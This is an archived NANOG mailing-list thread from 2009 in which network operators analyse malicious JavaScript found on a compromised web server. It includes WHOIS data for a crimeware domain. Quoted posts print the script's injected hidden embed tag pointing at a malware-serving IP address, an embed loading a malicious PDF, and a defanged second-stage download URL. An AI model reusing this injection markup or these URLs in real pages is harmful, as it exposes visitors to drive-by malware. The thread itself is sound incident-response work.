Malicious code just found on web server
Jake Mailinglists
jbabbinlists at gmail.com
Mon Apr 20 14:42:52 UTC 2009
Paul,
I noticed that in the PDF file but as the domain doesn't seem to have
resolution I didn't mention it.
Jake
WHOIS information on the domain
Whois Record
domain: TEST1.RU
type: CORPORATE
nserver: ns1.centerhost.ru.
nserver: ns1.cetis.ru.
state: REGISTERED, DELEGATED
org: Center of Effective Technologies and Systems CETIS
phone: +7 4957711654
fax-no: +7 4957879251
e-mail: <http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a>
e-mail: <http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff>
registrar: REGRU-REG-RIPN
created: 2001.03.30
paid-till: 2010.04.03
source: TC-RIPN
Registry Data Created: 2001-03-30 Expires: 2010-04-03 Whois Server:
whois.ripn.net
Server Data Domain Status: Registered And No Website
On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson <fergdawgster at gmail.com>wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate at gmail.com>
> wrote:
>
>
> >> I took a quick look at the code... formatted it in a pastebin here:
> >> http://pastebin.com/m7b50be54
> >>
> >> That javascript writes this to the page (URL obscured):
> >> document.write("<embed
> >> src=\"hXXp://
> 77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|<http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown%7C>
> >> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
> >> type=\"application/pdf\"></embed>");
> >>
> >> The 1.2.3.4 in the URL is my public IP address (I changed that).
> >>
> >> Below the javascript, it grabs a PDF:
> >> <embed src="include/two.pdf" width="1" height="0"
> >> style="border:none"></embed>
> >>
> >> That PDF is on the site, I haven't looked at it yet though.
> >>
>
> Not only is that .pdf malicious, when "executed" it also fetches additional
> malware from:
>
> hxxp:// test1.ru /1.1.1/load.php
>
> If that host is not in your block list, it should be -- known purveyor of
> crimeware.
>
> This is in addition to the other malicious URLs mentioned in this thread.
>
> - - ferg
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP Desktop 9.5.3 (Build 5003)
>
> wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI
> mxM8Ci/feKnJe6M6qbiESPw=
> =b0Yj
> -----END PGP SIGNATURE-----
>
>
>
> --
> "Fergie", a.k.a. Paul Ferguson
> Engineering Architecture for the Internet
> fergdawgster(at)gmail.com
> ferg's tech blog: http://fergdawg.blogspot.com/
>
>
More information about the NANOG
mailing list